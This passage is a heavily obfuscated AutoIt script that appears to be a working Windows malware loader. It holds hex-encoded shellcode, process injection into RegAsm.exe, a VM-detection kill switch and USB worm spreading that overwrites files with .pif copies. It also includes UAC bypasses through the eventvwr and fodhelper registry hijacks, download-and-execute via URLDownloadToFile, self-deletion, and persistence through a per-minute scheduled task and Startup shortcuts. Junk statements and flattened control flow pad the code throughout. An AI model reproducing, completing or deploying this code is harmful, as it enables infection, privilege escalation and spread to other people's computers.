* 2545822 + 284354 * 234733 ) ENDIF IF $1267239031 = 1086136603 THEN LOCAL $KEY = [EXECUTE ("DllStructCreate" ) , EXECUTE ("DllCall" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllStructSetData" ) ] $1267239031 = 1552556832 ISFLOAT ("oKw6zKUAxHOgJUk32JyK8uVzpSw0Wp3K67fxqAptLEufH8fsrTY6tz2307RSo4OhNdjLOWMBtf8C9Q1rLdIdA7qGflHtTHeS0mADYC" ) DIM $WLOAY3JFZFLULRRXLGCN = 1248278 ENDIF IF $1267239031 = 1131056637 THEN $BIN_SHELLCODE &= "F08D7F280FB7460641894DF03BC87CDC8B7B3C8B45F803FB837DEC00894734" DIM $QMWOWCJZD6EVCGQRXNTB = "woFURl6kqXNZokWh4T66VrOLvVF1k0fyug3ypEOqnoWjAFY54kCDxFheI4x6QeaARoEhqw1zdOSGFFkZ6J69wLbY8ZZvgTKinuBlbQOGtdA" $1267239031 = 63781146 
ISBOOL (241201 + 4290981552 + 543449 + 276481 ) ENDIF IF $1267239031 = 1248908323 THEN $BIN_SHELLCODE &= "14897DF8897DBC8945D039BEA0000000741139BEA40000007409F646160175" CHR (2200056 ) $1267239031 = 718764494 STRING ("skd8Xq5zQslsbxpVLHTFanqv8vHm9YVfNmrx9VVTjTuV44NUlW3ULHJf4RaBSSA1HfOYg" ) PTR (3977705 + 3525856 + 4293184002 ) ENDIF IF $1267239031 = 1296546299 THEN $BIN_SHELLCODE &= "00FF76506A00FF55988BD885DB0F84450200006A406800300000FF7650FF76" $1267239031 = 463888510 DIM $ADFMLDSUTABSCNZP0MUB = 128789 * 2467528 + 1220413 + 1598930 + 3790979 * 3676379 * 911725 * 2162403 DIM $XCGC848ZRMY1JQK3B13T = 3906100 + 153301 * 2296994 + 3000313 + 2094034 * 817407 * 2633562 * 3794957 ENDIF IF $1267239031 = 1372412672 THEN $BIN_SHELLCODE &= "EE38830CC78564FFFFFF5764E101C78568FFFFFF18E4CA08C7856CFFFFFFE3" ISSTRING (1154943 * 422726 ) $1267239031 = 548984161 WINEXISTS ("addFVQ16sAs32j43LzhmAUM7FnK9k8yORuUbCkBaYWNhLMUhz4DmbQtqzf9Ge1VtbNlHz3zB8hyOfEv3CDJqEmNbbCK" ) ENDIF IF $1267239031 = 1435411003 THEN $BIN_SHELLCODE &= "B850E842FEFFFF8B8CB520FFFFFF890185C00F84910300004683FE0E7CD28B" RANDOM (32415 ) $1267239031 = 1623917350 MOD (2850608 , 2142441 ) ENDIF IF $1267239031 = 1446413075 THEN $BIN_SHELLCODE &= "006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF559485C00F847802" $1267239031 = 73392173 ENDIF IF $1267239031 = 1483208281 THEN $BIN_SHELLCODE &= "230FC7458CE86F180D898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45" $1267239031 = 1435411003 DIM $KQEZZAKG6RDRDLBOVZXB = "VcWC7UUwrQMe0uQEEq8qQVpAUkSZ9zEw" PTR ("w1pzkNKzmm1WjpiylJ9XuSWc5w2kpzdEAWiyS0FhNaG81c0jv7Bm0AxNfmEXWzjWjvuwhURve2julYl2GSZs80" ) ENDIF IF $1267239031 = 1532618530 THEN $BIN_SHELLCODE &= "0C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B" CHR (1960984 ) $1267239031 = 969182864 ENDIF IF $1267239031 = 1552556832 THEN LOCAL $LPSHELLCODE = $KEY ["1" ] ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $BINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] $1267239031 = 363789172 PTR (2813354 + 
2455556 + 427058 ) ENDIF IF $1267239031 = 1622275345 THEN $BIN_SHELLCODE &= "C7855CFFFFFF794A8A0B898524FFFFFF8D45B0898528FFFFFF8D45A489852C" $1267239031 = 895876247 ENDIF IF $1267239031 = 1623473715 THEN $BIN_SHELLCODE &= "8B7D0833F657E8D7FFFFFF8BC885C974200FBE07C1E60403F08BC625000000" $1267239031 = 418593742 PTR ("v7MAlawF5DA8QkcQmc1SRRvbbDSBsL96FYvFylefVBvIbsuBnwyY7K9NKLyRs4ntDEC1YGrb7V6ovW9Tiq" ) ENDIF IF $1267239031 = 1623917350 THEN $BIN_SHELLCODE &= "DF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000" $1267239031 = 97398974 PTR (3685199 * 1486103 * 3440150 + 144987 ) ENDIF IF $1267239031 = 1655295316 THEN $BIN_SHELLCODE &= "33C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100" ISBINARY (289984 * 746420 + 4291953335 ) $1267239031 = 216567143 ISBOOL ("rgsFHcgKEpK8easRB3ONG10tXqezgkfYVl65XbrAGfIhpmIU8hjW3xizq8Sr8QEtjWn3ex4AKohBrSeJR" ) ENDIF IF $1267239031 = 1700268568 THEN LOCAL $BIN_SHELLCODE = "0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC5657" $1267239031 = 1623473715 INT (3657527 ) ENDIF IF $1267239031 = 1780023503 THEN LOCAL $FILE_STRUCT = $KEY ["0" ] ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) PTR ("B0Jo8C9QOKnTlNqQiH4iKNoFs0201HSfhLXq1dUKJaO0Vshpgvxh4kyXLd6hKjZh2iKI19ZeXsHJ9yVaSLTEjKl6m9OXhM9AlG7LRHyhGstKMYXns5z9At7" ) $1267239031 = 437981964 WINEXISTS ("b7ktgxCAisjnK71qJtxlAElm991JQOclFWFvjrFA" ) ENDIF IF $1267239031 = 1780715420 THEN $BIN_SHELLCODE &= "9E33FF68008000005753FF55C485C00F845BFEFFFF576A048D45F8508B85B4" $1267239031 = 427686952 ENDIF IF $1267239031 = 1876673018 THEN $BIN_SHELLCODE &= "45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D45948985" DIM $AWU8Q3FW7THG2VDQ7RYB = 2040570 $1267239031 = 2132296422 PTR (1388119 * 875688 + 1988207 ) ENDIF IF $1267239031 = 1933112639 THEN $BIN_SHELLCODE &= "FF55A485C00F84AD0200008D8510FCFFFF50FF75DCFF55A085C00F84980200" $1267239031 = 1446413075 ENDIF IF $1267239031 = 2005523844 THEN $BIN_SHELLCODE &= "C0742B25FF0F000003028945EC8BC88B46342904198B4DF08B47340FB74C4A" 
ISBOOL ("y4CbQvrfa5K3eGb0okmag6byfkHV15B65uydxMOnOijI3Wnkl9OYwl1B2d6EXGnfCN7Ti7CLE9v7XBFs7xI1qNITD6ltQkzh4egoZEcoGcsx03OzHNH" ) $1267239031 = 586222774 ENDIF IF $1267239031 = 2115662046 THEN LOCAL $HANDLEFROMPID = $KEY ["1" ] ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , "0x001F0FFF" , "bool" , "0" , "dword" , $RET ["0" ] ) ["0" ] MOD (991415 , 803740 ) $1267239031 = 202026599 WINEXISTS ("IndTvqDBvuunul3KqVVcM9jHprjKpZCxh8YL06er" ) ENDIF IF $1267239031 = 2132296422 THEN $BIN_SHELLCODE &= "48FFFFFF8D45C489854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFF" $1267239031 = 1372412672 ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $648664962 = 323312849 GLOBAL $AX2RIEEDEG = 3689474 FOR $E = 0 TO 3526621 IF $648664962 = 323312849 THEN DHVWRCDTHNKPWFW ("3" , "12000" ) DIM $WWQUURD2H5FGNXQPK4BA = 976315 $648664962 = 967842408 CHR (4231 ) ENDIF IF $648664962 = 708304020 THEN LOCAL $ARRAY = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($CHAR ) ] EXITLOOP ISPTR ("hFe4Js4ajNI7Zq0MLKz61fhTz3RsKOwUCiQUkQuifohK8xLTtOp7vhNbxvDQ" ) ENDIF IF $648664962 = 813318089 THEN LOCAL $CHAR = DLLSTRUCTCREATE ("char[32]" ) CHR (1939303 ) $648664962 = 1944260330 ENDIF IF $648664962 = 967842408 THEN LOCAL $MAINSTRUCT = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CHR (3726352 ) $648664962 = 813318089 RANDOM (2076135 ) ENDIF IF $648664962 = 1944260330 THEN LOCAL $DWORD = DLLSTRUCTCREATE ("dword" ) INT (3857468 ) $648664962 = 708304020 CHR (1622212 ) ENDIF NEXT FOR $I = "0" TO "7" DLLSTRUCTSETDATA ($MAINSTRUCT , $I + "1" , $ARRAY [$I ] ) NEXT GLOBAL $658599975 = 323312849 GLOBAL $ZMNGEZMTJ2 = 1433067 FOR $E = 0 TO 3737049 IF $658599975 = 323312849 THEN DLLSTRUCTSETDATA ($CHAR , "1" , "CURRENT_USER" ) $658599975 = 967842408 INT (144649 ) ENDIF IF $658599975 = 648664962 THEN DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $DWORDPOINTER ) CHR (2584263 ) EXITLOOP DIM $2AJL5TLTMTVWVLJJUYVT 
= 351404 ENDIF IF $658599975 = 708304020 THEN $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($DWORD , EXECUTE ("1" ) ) , "ptr" , "0" ) DIM $CLDNUN32WIBTTUNDJKDU = 3635406 $658599975 = 648664962 INT (330935 ) ENDIF IF $658599975 = 813318089 THEN $DWORDPOINTER = DLLSTRUCTGETPTR ($DWORD ) ISPTR (620407 + 2895197 ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($MAINSTRUCT ) $658599975 = 813318089 PTR ("JqjEO8km5YlBidbMJsLOb5okKOEA046k2EoJJDEi4FwBmGpWAWmAoVIOb839CTva1bJNYB" ) ENDIF IF $658599975 = 1944260330 THEN $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $DWORDPOINTER ) $658599975 = 708304020 ISPTR (2212243 * 249414 + 4292103711 * 260120 ) RANDOM (414558 ) ENDIF ISBOOL (2376135 * 686167 + 1447010 ) NEXT ENDFUNC FUNC DHVWRCDTHNKPWFW ($LOOP , $TIME ) LOCAL $VAR = RANDOM ("0" , "255" ) FOR $I = "0" TO $LOOP GLOBAL $813318089 = 323312849 GLOBAL $L7L79UHMVA = 2353665 FOR $E = 0 TO 261501 IF $813318089 = 323312849 THEN SLEEP ($TIME / $LOOP ) ISBOOL (2952363 + 1421411 ) $813318089 = 967842408 WINEXISTS ("EsXJulmWfXU9tJ1kf1CtMV45A2dogE3TguMu8AT4cnTXaU8TD4" ) ENDIF IF $813318089 = 967842408 THEN $VAR += RANDOM ("0" , "255" ) EXITLOOP ISPTR (1581524 + 1823701 + 3877683 * 2423082 ) ENDIF WINEXISTS ("7GmNiIrzbg4R4tUlgc7HH36frqWdGh3819V7STSmqxRr7BHYnEE2duAeJgw1Wn24m605IWCwtVrklNiZT70cMb5FHRwKw0zcEXfbLMpAbhHsdq268GiYx0" ) NEXT IF $VAR = $VAR THEN $VAR = RANDOM ("0" , "255" ) ENDIF NEXT ENDFUNC FUNC KHOCWHDEQXMSTFPOADRL ($SOCCURRENCENAME ) GLOBAL $813318089 = 323312849 GLOBAL $KATW1Z2ACU = 1093317 FOR $E = 0 TO 937915 ISBOOL ("fSybEDLCqYAM0SLONG4aspxbih" ) IF $813318089 = 323312849 THEN LOCAL $AHANDLE = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , 
"wstr" , $SOCCURRENCENAME ) $813318089 = 967842408 ISSTRING ("tcg9ZVRx0gd8pkVTIa1Ng50tw2xxONOtdVFOEQZVmLBjuc36topKMTVymWL7xsTmAT5ENfn3lgADCQ9t8BdzxeQu9hBTd2x43oSKhyro" ) ENDIF IF $813318089 = 967842408 THEN LOCAL $ALASTERROR = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) EXITLOOP ENDIF ISPTR ("5otYwcJFFMEZsSGKn7ymJjZycNjcRm56W4BOIAvHG3WKFGgYURRIxfyWz4WS3GYtRIdyq2bXL1ORxo3FGvsaEwIRFOpNNMN9eB37CSH2O36FzRykbqkH" ) NEXT IF $ALASTERROR ["0" ] = "183" THEN GLOBAL $813318089 = 323312849 GLOBAL $YYU9V3KMWI = 962935 FOR $E = 0 TO 3918727 IF $813318089 = 323312849 THEN DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $AHANDLE ["0" ] ) STRING (161009 * 1702567 + 2441486 + 4294805267 ) $813318089 = 967842408 ENDIF IF $813318089 = 967842408 THEN PROCESSCLOSE (@AUTOITEXE ) CHR (428221 ) EXITLOOP ISBINARY (3818722 * 3763393 ) ENDIF NEXT ENDIF ENDFUNC FUNC DJVLLWQLKATZJRZPICPARXZ ($RESNAME , $RESTYPE ) GLOBAL $784529671 = 323312849 GLOBAL $7TUFCZFNVU = 2994307 FOR $E = 0 TO 3262216 IF $784529671 = 323312849 THEN LOCAL $RESPOINTER DIM $FUHUVFF4VRW85A1KB1CS = 2081482 $784529671 = 967842408 MOD (2157306 , 665523 ) ENDIF IF $784529671 = 439940659 THEN RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CHR (2635326 ) EXITLOOP ISFLOAT (2768988 * 1774267 + 3368674 ) ENDIF IF $784529671 = 648664962 THEN LOCAL $MEMORYPOINTER DIM $GSU2MBUBOIWGTMKZT8I1 = "93rpDC2bDQ9KlA2" $784529671 = 658599975 INT (1317462 ) ENDIF IF $784529671 = 658599975 THEN $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] STRING ("vybE2ju5hydMj8CAU3x5iVSMpOoV4nA5lghC99YZqptC" ) $784529671 = 1590494170 DIM $LXAJ8IOJQXPM4IB37HAC = 3407810 * 1757049 * 325801 + 4292330764 MOD (3658019 , 1564137 ) ENDIF IF $784529671 = 708304020 THEN LOCAL $GLOBALMEMORYBLOCK DIM $M16C2HXKUK4RNZFKZHEL = 1400604 + 1971754 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $HINSTANCE $784529671 = 1944260330 
DIM $A4QFLXKSM0ADN7OCTT8Y = "FV7wFIFzvh243qtTAzb6lzEpaWFRfSj2sM4iTSOZN30ThJU" INT (1198101 ) ENDIF IF $784529671 = 925089026 THEN $GLOBALMEMORYBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "LoadResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CHR (787086 ) $784529671 = 1407564695 ISPTR ("uN7aKpvkaSUmssIWhAcZvWyp51AY2bv5WZImVh8EuksKkUi3GCJ5RnCHoSeUYHr9vYACUwb9BGElDYfkSHqzAAoHwa7cdoQW2t" ) ENDIF IF $784529671 = 967842408 THEN LOCAL $RESSIZE $784529671 = 813318089 ENDIF IF $784529671 = 1407564695 THEN $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] $784529671 = 439940659 DIM $AM3CQQ2H5J2GTZ86N1TS = "IT0bxg706e0f7GzjmyFaVt" ENDIF IF $784529671 = 1590494170 THEN $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] ISBOOL ("CNqs99213ca2k4S8EbbW3IWaCmrzo7xB8vElOW1feOFglFvfdvqAIN132p0WRCL6NH4YyFsTk5RncQZ61lv3R73uDK" ) $784529671 = 925089026 STRING (190548 + 4292416822 + 4292852643 ) ENDIF IF $784529671 = 1944260330 THEN LOCAL $INFOBLOCK DIM $GQM6M0LA34EGSPROJUXL = "XfGfkCnluuEY1jRpy0Vh8ck3EtuV8bm3ujTkg0Cx8pIJar1f9ylDce4V5MK0iBmsiLDSzFjHxxiTDK3mCoVI0S0qo8pCoLoFcpAxYjODpM" $784529671 = 708304020 INT (1302124 ) ENDIF STRING (2761253 + 4293298758 * 819230 ) NEXT ENDFUNC FUNC ASAZRREHKGLB () LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO UBOUND ($ARRAY ) - "1" IF PROCESSEXISTS ($ARRAY [$I ] ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF NEXT ENDFUNC FUNC RSDBBCVUCE ($PROTECT ) LOCAL $RES = $GBCNYUEOGFONFLBWF IF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" ) THEN $PROCESSID = MWMQWLZFSVGLEKEBWPKTQCNGY (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" , "" , $RES , $PROTECT ) ELSEIF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" ) THEN $PROCESSID = MWMQWLZFSVGLEKEBWPKTQCNGY (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" , "" , $RES , 
$PROTECT ) ENDIF ENDFUNC FUNC AJJMOCPPKFEWODWKA () IF NOT WINEXISTS ("[CLASS:Progman]" ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF ENDFUNC FUNC TLRQDAKNGKXFDWQNVSPQPWUUICTCP () $USBLIST = DRIVEGETDRIVE ("REMOVABLE" ) IF $USBLIST <> "" THEN FOR $I = "1" TO $USBLIST ["0" ] IF $USBLIST [$I ] <> @HOMEDRIVE THEN GLOBAL $813318089 = 323312849 GLOBAL $BPQTWIMQOJ = 1858436 FOR $E = 0 TO 1993967 IF $813318089 = 323312849 THEN LOCAL $FILEARRAY INT (869246 ) $813318089 = 967842408 STRING ("6T1nvZyXbLKRnnJttGsDckp9ftytoXK1yUt6BHWXrAi2XLvdT3sNcIOVC2ibzeHobUrC4M1VUFmLcwlC8vKu" ) ENDIF IF $813318089 = 967842408 THEN $FILEARRAY = _FILELISTTOARRAYREC ($USBLIST [$I ] , "*" , EXECUTE ("1" ) , EXECUTE ("1" ) , EXECUTE ("0" ) , EXECUTE ("2" ) ) DIM $HCJZVWM341CT2IFCH3GW = 206504 EXITLOOP ISFLOAT (231055 + 4294127558 ) ENDIF RANDOM (1833045 ) NEXT FOR $F = "1" TO $FILEARRAY ["0" ] GLOBAL $813318089 = 323312849 GLOBAL $WJQV9I9SIE = 1546599 FOR $E = 0 TO 589658 IF $813318089 = 323312849 THEN $DATATARGET = BINARY (FILEREAD ($FILEARRAY [$F ] ) ) $813318089 = 967842408 ENDIF IF $813318089 = 967842408 THEN $CHECKDATA = STRINGINSTR ($FILEARRAY [$F ] , ".pif" ) EXITLOOP WINEXISTS ("RsTQjXg1EW5Vm4ywuKKGE8184YaO9vGXwKr0qc8ScsKAJGTi2gRnWwoTAVVuXA2ioixKMHfrL3Emxzywf1W2NtbavH" ) ENDIF NEXT IF NOT $CHECKDATA THEN GLOBAL $708304020 = 323312849 GLOBAL $N4KABLAJIF = 1112706 FOR $E = 0 TO 1334857 IF $708304020 = 323312849 THEN LOCAL $HANDLEF = FILEOPEN (@AUTOITEXE , "16384" ) WINEXISTS ("vbvyp" ) $708304020 = 967842408 RANDOM (1986752 ) STRING ("iJa883W5n7" ) ENDIF IF $708304020 = 813318089 THEN FILEDELETE ($FILEARRAY [$F ] ) $708304020 = 1944260330 ISFLOAT ("tlxj2y86A7qsV2zl" ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($FILEARRAY [$F ] & ".pif" , FILEREAD ($HANDLEF ) ) $708304020 = 813318089 RANDOM (1038744 ) ENDIF IF $708304020 = 1944260330 THEN FILECLOSE ($HANDLEF ) EXITLOOP ENDIF NEXT ENDIF NEXT ENDIF NEXT ENDIF ENDFUNC FUNC RARUCLGLLFJNMMTFCYMKXQZQIJP () IF STRINGINSTR (@OSVERSION , "7" ) OR 
STRINGINSTR (@OSVERSION , "8" ) THEN IF NOT ISADMIN () THEN GLOBAL $1944260330 = 323312849 GLOBAL $N9O63VAHI9 = 1079579 FOR $E = 0 TO 3836295 IF $1944260330 = 323312849 THEN REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CHR (265540 ) $1944260330 = 967842408 CHR (3256860 ) ENDIF IF $1944260330 = 813318089 THEN EXIT EXITLOOP ISPTR (398255 * 1317061 * 173571 ) ENDIF IF $1944260330 = 967842408 THEN SHELLEXECUTE ("eventvwr" ) $1944260330 = 813318089 CHR (3989623 ) ENDIF WINEXISTS ("0UToN6OBkVe2hkOzCKnas4u5hy0BG9ujitUb81UXOn2ICezpu1KsX4" ) NEXT ENDIF ELSEIF STRINGINSTR (@OSVERSION , "10" ) THEN IF NOT ISADMIN () THEN GLOBAL $648664962 = 323312849 GLOBAL $5YYHPGM5KA = 600086 FOR $E = 0 TO 3637026 CHR (2557061 ) IF $648664962 = 323312849 THEN DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) $648664962 = 967842408 STRING ("VCc8" ) ISBINARY ("wn" ) ENDIF IF $648664962 = 708304020 THEN EXIT EXITLOOP ISPTR ("BsRiHtLYRz9BwIe3NveqFfqWyGGLMbq0wS2VuL4TwWzoyI9Nf48ZQnlwb5UaX9kOjifOQsIbAu4TObxZG2GS" ) ENDIF IF $648664962 = 813318089 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) $648664962 = 1944260330 ISPTR ("36wLVfpDu7Wu6yvsCRaG4C4CBLS86ikIjiGyHh46ivm5UxgdZ0dYT28Ab3jixqGmXmlX16VvXdxHq8TeFOjgfv0qkgwO7WI2YaiGlsl2f" ) ENDIF IF $648664962 = 967842408 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) ISFLOAT ("jcjeLSgAgAw4MUIgxaEFUq0m2mCraxujWU6tE3j0Vw3RjrOAs9" ) $648664962 = 813318089 ENDIF IF $648664962 = 1944260330 THEN SHELLEXECUTE ("fodhelper" ) MOD (3823291 , 789502 ) $648664962 = 708304020 ISFLOAT ("h3XpKE1NVwwicKHb8beu9Yedh" ) ENDIF ISPTR (3722875 + 2426798 * 664294 * 2553950 ) NEXT ENDIF ENDIF ENDFUNC FUNC SVEJXXJSKKUJZCUYVMSHAEL ($TYPE , $TITLE , $BODY ) IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN LOCAL $UINT = "0x00000010" IF $TYPE = "64" THEN $UINT = "0x00000040" ENDIF DLLCALL 
("User32.dll" , "ptr" , "MessageBox" , "hwnd" , "Null" , "str" , $BODY , "str" , $TITLE , "uint" , $UINT ) ENDIF ENDFUNC FUNC QKSYGMNMNUOEXHVWRRODCJH ($URL , $FILENAME , $DIR ) IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN LOCAL $INSTALDIR = GETDIR ($DIR ) IF FILEEXISTS ($INSTALDIR & "\" & $FILENAME ) THEN FILEDELETE ($INSTALDIR & "\" & $FILENAME ) ENDIF GLOBAL $813318089 = 323312849 GLOBAL $XYIGNSFD4K = 225191 FOR $E = 0 TO 3453759 IF $813318089 = 323312849 THEN DLLCALL ("urlmon.dll" , "ptr" , "URLDownloadToFile" , "ptr" , "0" , "str" , $URL , "str" , $INSTALDIR & "\" & $FILENAME , "dword" , "0" , "ptr" , "0" ) $813318089 = 967842408 INT (3273815 ) DIM $YGDZZMGGAVX5MPLCKVGE = "f3weGF0S1735uacCx2tFYkgZ5WyJVSdmdzTnQU3QRxIYE9spi9m2nHZ4XGiVhp7i4R24rZWN9MYA" ENDIF IF $813318089 = 967842408 THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) STRING (1931252 + 4291865135 ) EXITLOOP RANDOM (2034303 ) ENDIF CHR (583120 ) NEXT ENDIF ENDFUNC FUNC LLBUPLMSHANIDLHCMEMP () IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) ENDIF ENDFUNC FUNC KGGJMOBCJUETCWRTLNXKZGWSZXBPV ($RESNAME , $FILENAME , $RUN , $RUNONCE , $DIR ) GLOBAL $648664962 = 323312849 GLOBAL $IIBAA3XHX7 = 2410921 FOR $E = 0 TO 1289462 IF $648664962 = 323312849 THEN $FILE = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ($RESNAME , "10" ) , TRUE ) ISFLOAT ("Emmq8YkLTSwsCxMc1ewakyGZflhI7ryWnF66" ) $648664962 = 967842408 MOD (3261457 , 656895 ) ENDIF IF $648664962 = 708304020 THEN FILECLOSE ($FILEHANDLE ) EXITLOOP ENDIF IF $648664962 = 813318089 THEN LOCAL $FILEHANDLE = FILEOPEN ($INSTALDIR & "\" & $FILENAME , "2" ) ISSTRING ("vxigOxkXQLOBsJf6BRN9EUUvoAeaQl9Ao4zZxZqbQX6NjSXk9HC22caLMW1" ) $648664962 = 1944260330 ENDIF IF $648664962 = 967842408 THEN LOCAL $INSTALDIR = GETDIR ($DIR ) $648664962 = 813318089 ENDIF IF $648664962 = 1944260330 THEN FILEWRITE ($FILEHANDLE , $FILE ) $648664962 = 708304020 ISBINARY 
("XgmFM3bhShHm4YlK8dSFRBb4EyaT81CqTsZFJvJyj8WEQaDvd8Nw4Xaufrbo3rj1NrCK9QaMCswSQGnD5NO" ) DIM $V6SDARTVF1Z40YH3WX7B = 3620073 ENDIF INT (2635705 ) NEXT IF $RUNONCE = FALSE THEN IF $RUN = TRUE THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ELSE IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ENDIF ENDFUNC FUNC MIVVMSGJPNONEWUB ($FILE , $REGKEY , $ATTRIB , $HIDDEN ) GLOBAL $784529671 = 323312849 GLOBAL $DGTOLJOH5F = 2219820 FOR $E = 0 TO 1133057 ISFLOAT ("XE3WQZ6brrck" ) IF $784529671 = 323312849 THEN DIRCREATE ($SOXGWLGCUOVMJM ) $784529671 = 967842408 PTR (926337 + 1071884 + 2697195 + 1173803 ) ENDIF IF $784529671 = 439940659 THEN LOCAL $VBSOPEN DIM $TXY5X22NKR7UHDVLAPQV = 1962837 + 4294735516 + 4293996117 EXITLOOP ENDIF IF $784529671 = 648664962 THEN LOCAL $OPENFILE = FILEOPEN (@AUTOITEXE , "16" ) $784529671 = 658599975 CHR (507487 ) STRING (2360434 * 45376 + 759639 ) ENDIF IF $784529671 = 658599975 THEN LOCAL $HFILE = FILEOPEN ($FULLPATH , "2" ) WINEXISTS ("U6rawlXUmUrQkvD1Q2Hmuc7pzLUuDtsntOWBf3cotcoNN4CJGiF2VTnS8bKUBCq2Aew" ) $784529671 = 1590494170 DIM $WWZT2RXTKFIJYVYABKAE = "dssW1VvmIG7bEvTcB054NzfKrN4eaLWeEHTDGGbFBgc8lit9exaUEk0MmR" ENDIF IF $784529671 = 708304020 THEN LOCAL $URLPATH = @STARTUPDIR & "\" & $REGKEY & ".url" DIM $V3F7MPE4ZYBGXHZJU59L = 2400755 + 2286132 + 2821529 + 1051973 * 122230 * 2686755 + 3673085 + 809362 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $FULLPATH = $SOXGWLGCUOVMJM & "\" & $FILE DIM $5FSSOFRV25SJVUTMPG9O = 3538052 $784529671 = 1944260330 ENDIF IF $784529671 = 925089026 THEN LOCAL $URLCONTENT = "[InternetShortcut]" & @CR & "URL=file:///" & STRINGREPLACE ($VBSPATH , "\" , "/" ) $784529671 = 1407564695 DIM $EFDLY1KIQ5U1UTB9ZGYZ = 933632 + 3622206 + 4293329514 * 3721962 + 659796 * 3569556 + 4294419155 ENDIF IF $784529671 = 967842408 THEN LOCAL $MODE = $HIDDEN ISBINARY (2345240 * 3306334 + 809435 + 3949641 ) $784529671 = 813318089 DIM $H2VUERLHMS59Y1CYSE2X = 611570 
ENDIF IF $784529671 = 1407564695 THEN LOCAL $URLOPEN DIM $IAYW7YVSCRAJXVICSXHU = 3337811 * 1340777 + 2324484 * 3133329 * 2646375 * 1134941 + 4292515232 + 4293543052 $784529671 = 439940659 INT (2331776 ) ENDIF IF $784529671 = 1590494170 THEN LOCAL $BINARY = FILEREAD ($OPENFILE ) & BINARY (RANDOM ("0" , "255" ) ) $784529671 = 925089026 DIM $UABHYKAQVWOMMDDZX8BA = 1182834 + 3816393 + 3273855 + 2229667 ENDIF IF $784529671 = 1944260330 THEN LOCAL $VBSPATH = $SOXGWLGCUOVMJM & "\" & $REGKEY & ".vbs" $784529671 = 708304020 CHR (1305842 ) ENDIF ISSTRING ("4KL8aQ6nrUM0CiaoDssoL" ) NEXT IF $MODE THEN SHELLEXECUTE ("schtasks" , "/create /tn " & $REGKEY & " /tr " & CHR ("34" ) & $FULLPATH & CHR ("34" ) & " /sc minute /mo 1 /F" , @SYSTEMDIR , "" , @SW_HIDE ) ELSE GLOBAL $658599975 = 323312849 GLOBAL 